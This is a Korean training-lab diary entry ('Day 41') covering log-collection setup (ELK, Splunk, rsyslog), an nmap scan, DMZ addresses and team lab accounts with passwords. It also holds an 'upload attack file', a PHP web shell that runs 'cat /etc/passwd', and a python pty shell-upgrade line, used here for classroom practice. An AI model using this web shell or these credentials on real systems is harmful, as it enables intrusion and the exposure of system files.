41일차

41일차

홈으로 돌아가기 

미션1
각조별 서버 담당자 접속후 packetbeat, filebeat 설치
ssh 192.168.0.106 22003

192.168.0.117 접속후 ELK+Splunk 설치후
106과 통신 여부 확인
2조부터 테스트 2조 > 3조 > 4조 > 1조
완료후에 실습망으로 연결 예정

RSYSLOG 설정(22.04)
192.168.0.115
3조 > 4조 > 1조 >2조
각 서버와 연결 테스트


rsyslog .252로 설정


IP & 포트 스캔
nmap -v -sS -O 192.168.1.0/24

DMZ 정보
10.10.10.254 게이트웨이
10.10.10.253 윈도우 ( 각조 서버 저장 : 10.10.10.1~10.10.10.4)
10.10.10.252 윈도우 ( rsyslog : 10.10.10.251, monitor : 10.10.10.250)
ssh st.kr 22250
ELK > st.kr:8250 st.kr:8000

업로드 공격 파일
?php
  $output = [];
  exec("cat /etc/passwd", $output);

  foreach ($output as $line) {
    echo htmlspecialchars($line)."br>";

python3 -c 'import pty;pty.spawn("/bin/bash")'

sudo visudo
user1 ALL=(ALL) !ALL

계정 잠굼
passwd -l user
계정 잠금 해제
passwd -u user

1조
web1 / 8520
root / 0770
2조
add1 / 8347
web1 / 5065
4조
web2 / 9187
Copyright © snower's Website